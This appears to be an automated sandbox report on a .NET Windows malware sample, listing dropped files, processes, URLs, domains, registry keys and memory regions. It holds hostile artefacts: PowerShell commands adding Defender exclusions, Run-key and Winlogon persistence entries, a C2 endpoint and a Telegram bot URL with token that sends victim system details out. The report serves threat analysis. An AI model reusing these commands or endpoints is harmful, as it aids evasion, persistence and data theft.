Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
kQyd2z80gD.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Recovery\SearchApp.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Recovery\SearchApp.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Recovery\WmiPrvSE.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Recovery\WmiPrvSE.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\kQyd2z80gD.exe.log
|
CSV text
|
dropped
|
||
C:\Recovery\24dbde2999530e
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Recovery\38384e6a620884
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Recovery\5140eeb670c7f4
|
ASCII text, with very long lines (832), with no line terminators
|
dropped
|
||
C:\Users\Default\5140eeb670c7f4
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SearchApp.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dLErkomWRcaRguaKAMtYMnt.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fwor1wx.sqb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0s1pqnbe.dro.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zfw33pi.hzt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jzb5ry3.l4o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tgbpsph.yho.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eb5jkhpc.cst.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebn3tgjf.xpx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hytc305s.t01.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixmyw4u4.hbg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l40pauoc.v4p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luv5tkbn.ewm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lv0vjlew.ztr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohpy4g53.bcq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qveabrb0.4l4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzbxldse.urg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2qthjvs.xei.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2fesw54.zhj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuvthf2h.bfo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3daqyfy.rfn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoixnhwg.ctr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrmagh1x.23p.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykzlaqfc.url.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbjifgl4.kjf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuijph1w.1xc.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 32 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\kQyd2z80gD.exe
|
"C:\Users\user\Desktop\kQyd2z80gD.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
||
C:\Recovery\SearchApp.exe
|
C:\Recovery\SearchApp.exe
|
||
C:\Recovery\SearchApp.exe
|
C:\Recovery\SearchApp.exe
|
||
C:\Recovery\WmiPrvSE.exe
|
C:\Recovery\WmiPrvSE.exe
|
||
C:\Recovery\WmiPrvSE.exe
|
C:\Recovery\WmiPrvSE.exe
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
|
||
C:\Recovery\WmiPrvSE.exe
|
"C:\Recovery\WmiPrvSE.exe"
|
||
C:\Recovery\SearchApp.exe
|
"C:\Recovery\SearchApp.exe"
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
|
||
C:\Recovery\WmiPrvSE.exe
|
"C:\Recovery\WmiPrvSE.exe"
|
||
C:\Recovery\SearchApp.exe
|
"C:\Recovery\SearchApp.exe"
|
||
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
|
"C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
|
||
C:\Recovery\WmiPrvSE.exe
|
"C:\Recovery\WmiPrvSE.exe"
|
||
C:\Recovery\SearchApp.exe
|
"C:\Recovery\SearchApp.exe"
|
||
C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe
|
"C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe"
|
||
C:\Recovery\WmiPrvSE.exe
|
"C:\Recovery\WmiPrvSE.exe"
|
||
C:\Recovery\SearchApp.exe
|
"C:\Recovery\SearchApp.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 23 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://cm36861.tw1.ru/@=M2MiBTN3ImM
|
|||
http://cm36861.tw1.ru
|
unknown
|
||
http://cm36861.tw1.ru/
|
unknown
|
||
http://cm36861.tw1.ru/2b750b3c.php?Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ&3b482a1504ac77c5c43f7e15a2187b43=9f54798b89eb404995a9b7978336a5b8&c3f24358aa290547facbfb1d35d51e12=gN5QDZjZzMmJGZ0Y2NjFTZihjMxcTYmNTNkRDO4IWZlRGOwE2YyIDO&Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ
|
92.53.106.114
|
||
http://cm36861.tw1.ru/2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d528
|
unknown
|
||
https://ipinfo.io/missingauth
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.microsoft.coG
|
unknown
|
||
https://ipinfo.io/json8
|
unknown
|
||
http://ns.ad0/g/imj
|
unknown
|
||
https://t.me/vavaaffBOT
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://.AppV.UG
|
unknown
|
||
http://ipinfo.io
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://api.telegram.org/bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b040e0acd70ade6f5665d2ebc227f233d835d%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20040965%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20173.254.250.71%0A%E2%80%A2%20GEO%3A%20US%20%2F%20Dallas%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CdLErkomWRcaRguaKAMtYMnt.exe
|
149.154.167.220
|
||
http://ns.adobt/pg/j
|
unknown
|
||
https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b0
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ipinfo.io
|
unknown
|
||
https://go.microsof
|
unknown
|
||
http://crl.microso
|
unknown
|
||
http://ns.photo/j
|
unknown
|
||
https://api.telegram.org/bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https:/
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://ipinfo.io/json
|
34.117.59.81
|
||
https://ipinfo.io/miss
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://ipinfo.i
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ns.a1.0/auj
|
unknown
|
||
https://ipinfo.ioC5wbmc=
|
unknown
|
There are 30 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cm36861.tw1.ru
|
92.53.106.114
|
||
api.telegram.org
|
149.154.167.220
|
||
ipinfo.io
|
34.117.59.81
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
92.53.106.114
|
cm36861.tw1.ru
|
Russian Federation
|
||
34.117.59.81
|
ipinfo.io
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
dLErkomWRcaRguaKAMtYMnt
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
WmiPrvSE
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
WmiPrvSE
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
SearchApp
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
SearchApp
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
dLErkomWRcaRguaKAMtYMnt
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
dLErkomWRcaRguaKAMtYMnt
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
||
HKEY_CURRENT_USER\SOFTWARE\8f966bcf19df1d58bc3e30f28530c4d40fe273f0
|
2f88fddd33fa6c66561a330d34cd490fedc6dd9b
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dLErkomWRcaRguaKAMtYMnt_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\2099399cff359239b667274efa68133f
|
2099399cff359239b667274efa68133f
|
There are 18 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2CB1000
|
trusted library allocation
|
page read and write
|
||
2C21000
|
trusted library allocation
|
page read and write
|
||
24E1000
|
trusted library allocation
|
page read and write
|
||
2821000
|
trusted library allocation
|
page read and write
|
||
2BA1000
|
trusted library allocation
|
page read and write
|
||
26D1000
|
trusted library allocation
|
page read and write
|
||
3441000
|
trusted library allocation
|
page read and write
|
||
2C30000
|
trusted library allocation
|
page read and write
|
||
28A6000
|
trusted library allocation
|
page read and write
|
||
2BDD000
|
trusted library allocation
|
page read and write
|
||
319D000
|
trusted library allocation
|
page read and write
|
||
2B2000
|
unkown
|
page readonly
|
||
3200000
|
trusted library allocation
|
page read and write
|
||
2431000
|
trusted library allocation
|
page read and write
|
||
2BB0000
|
trusted library allocation
|
page read and write
|
||
28C1000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
trusted library allocation
|
page read and write
|
||
2631000
|
trusted library allocation
|
page read and write
|
||
2872000
|
trusted library allocation
|
page read and write
|
||
2764000
|
trusted library allocation
|
page read and write
|
||
31F1000
|
trusted library allocation
|
page read and write
|
||
2811000
|
trusted library allocation
|
page read and write
|
||
259D000
|
trusted library allocation
|
page read and write
|
||
27A1000
|
trusted library allocation
|
page read and write
|
||
2820000
|
trusted library allocation
|
page read and write
|
||
2691000
|
trusted library allocation
|
page read and write
|
||
26C3000
|
trusted library allocation
|
page read and write
|
||
2A01000
|
trusted library allocation
|
page read and write
|
||
2561000
|
trusted library allocation
|
page read and write
|
||
2A71000
|
trusted library allocation
|
page read and write
|
||
3181000
|
trusted library allocation
|
page read and write
|
||
30A1000
|
trusted library allocation
|
page read and write
|
||
3190000
|
trusted library allocation
|
page read and write
|
||
27CB000
|
trusted library allocation
|
page read and write
|
||
24F1000
|
trusted library allocation
|
page read and write
|
||
2A81000
|
trusted library allocation
|
page read and write
|
||
24E0000
|
trusted library allocation
|
page read and write
|
||
2CED000
|
trusted library allocation
|
page read and write
|
||
24D1000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
BA8000
|
heap
|
page read and write
|
||
20690347000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
20570151000
|
heap
|
page read and write
|
||
20690365000
|
trusted library allocation
|
page read and write
|
||
1DB19E35000
|
heap
|
page read and write
|
||
10EF000
|
stack
|
page read and write
|
||
20556134000
|
heap
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
2596000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
1B14F004000
|
heap
|
page read and write
|
||
205680CF000
|
trusted library allocation
|
page read and write
|
||
1DB32504000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1B0D0000
|
trusted library allocation
|
page read and write
|
||
E65000
|
heap
|
page read and write
|
||
14F5000
|
heap
|
page read and write
|
||
2069022E000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
556000
|
stack
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
20568007000
|
trusted library allocation
|
page read and write
|
||
2C3C000
|
trusted library allocation
|
page read and write
|
||
2A2C911F000
|
trusted library allocation
|
page read and write
|
||
28E665A0000
|
heap
|
page read and write
|
||
94D000
|
heap
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
205681DF000
|
trusted library allocation
|
page read and write
|
||
2A2C9162000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
20556177000
|
heap
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
2A2C9168000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
9E8F83F000
|
stack
|
page read and write
|
||
1DB32290000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
2A2C9350000
|
trusted library allocation
|
page read and write
|
||
3232000
|
trusted library allocation
|
page read and write
|
||
96B000
|
heap
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
7FF8490CA000
|
trusted library allocation
|
page read and write
|
||
7FF849172000
|
trusted library allocation
|
page read and write
|
||
1710000
|
heap
|
page read and write
|
||
2A2C8F91000
|
trusted library allocation
|
page read and write
|
||
1765000
|
heap
|
page read and write
|
||
9E9040C000
|
stack
|
page read and write
|
||
1B6EE000
|
stack
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1DB1AD6E000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
206ED605000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
206903DD000
|
trusted library allocation
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF84924D000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
28E4E336000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
8B6000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
206904A4000
|
trusted library allocation
|
page read and write
|
||
2A2C9438000
|
trusted library allocation
|
page read and write
|
||
20568176000
|
trusted library allocation
|
page read and write
|
||
7FF84921E000
|
trusted library allocation
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
CC4C0BE000
|
stack
|
page read and write
|
||
1B26F000
|
stack
|
page read and write
|
||
13D5000
|
heap
|
page read and write
|
||
1B134FA0000
|
heap
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
C5359F9000
|
stack
|
page read and write
|
||
7FF849202000
|
trusted library allocation
|
page read and write
|
||
1A9AF000
|
stack
|
page read and write
|
||
2056FF79000
|
heap
|
page read and write
|
||
932000
|
heap
|
page read and write
|
||
C86000
|
heap
|
page read and write
|
||
1DB19E10000
|
heap
|
page read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
124F3000
|
trusted library allocation
|
page read and write
|
||
9E8F8BC000
|
stack
|
page read and write
|
||
12A83000
|
trusted library allocation
|
page read and write
|
||
25FA000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1DB2A4E4000
|
trusted library allocation
|
page read and write
|
||
28E4E0F0000
|
heap
|
page readonly
|
||
6E8000
|
heap
|
page read and write
|
||
28CE000
|
trusted library allocation
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
2A2C93AE000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1BDCE000
|
stack
|
page read and write
|
||
320B000
|
trusted library allocation
|
page read and write
|
||
124F8000
|
trusted library allocation
|
page read and write
|
||
7FF848F97000
|
trusted library allocation
|
page read and write
|
||
ACD000
|
heap
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
1B134ED0000
|
heap
|
page read and write
|
||
24B0000
|
heap
|
page execute and read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
2A2B7060000
|
heap
|
page read and write
|
||
205682D3000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
1B146F28000
|
trusted library allocation
|
page read and write
|
||
1250000
|
trusted library allocation
|
page read and write
|
||
C96A63C000
|
stack
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
8B8000
|
heap
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
1DB2A1F0000
|
trusted library allocation
|
page read and write
|
||
6DF000
|
heap
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
1B6EE000
|
stack
|
page read and write
|
||
20556050000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
928000
|
heap
|
page read and write
|
||
205683D9000
|
trusted library allocation
|
page read and write
|
||
20570453000
|
heap
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
1B146E31000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
126E1000
|
trusted library allocation
|
page read and write
|
||
CC4BB7F000
|
stack
|
page read and write
|
||
1B137EF3000
|
trusted library allocation
|
page read and write
|
||
1BC4E000
|
stack
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
24D0000
|
heap
|
page execute and read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
7FF8491FA000
|
trusted library allocation
|
page read and write
|
||
12BA8000
|
trusted library allocation
|
page read and write
|
||
1263D000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
28E4F2B2000
|
trusted library allocation
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
1370000
|
trusted library allocation
|
page read and write
|
||
1B5BE000
|
stack
|
page read and write
|
||
1B3CE000
|
stack
|
page read and write
|
||
26CF000
|
trusted library allocation
|
page read and write
|
||
28E66406000
|
heap
|
page read and write
|
||
F78000
|
heap
|
page read and write
|
||
205704A2000
|
heap
|
page read and write
|
||
1344D000
|
trusted library allocation
|
page read and write
|
||
9E8F5BA000
|
stack
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
20690371000
|
trusted library allocation
|
page read and write
|
||
2055612C000
|
heap
|
page read and write
|
||
20690298000
|
trusted library allocation
|
page read and write
|
||
28E4E2A0000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
206ED500000
|
heap
|
page read and write
|
||
2A2C9123000
|
trusted library allocation
|
page read and write
|
||
205680D9000
|
trusted library allocation
|
page read and write
|
||
329C000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
7DF494200000
|
trusted library allocation
|
page execute and read and write
|
||
1B146E2C000
|
trusted library allocation
|
page read and write
|
||
15C0000
|
trusted library allocation
|
page read and write
|
||
2A2B70E6000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
1C113000
|
stack
|
page read and write
|
||
1B137DC6000
|
trusted library allocation
|
page read and write
|
||
1B62F000
|
stack
|
page read and write
|
||
1BA6E000
|
stack
|
page read and write
|
||
7FF848F87000
|
trusted library allocation
|
page read and write
|
||
14FF000
|
heap
|
page read and write
|
||
1B33E000
|
stack
|
page read and write
|
||
9E8F6BE000
|
stack
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
1BB6F000
|
stack
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
8B5000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
2599000
|
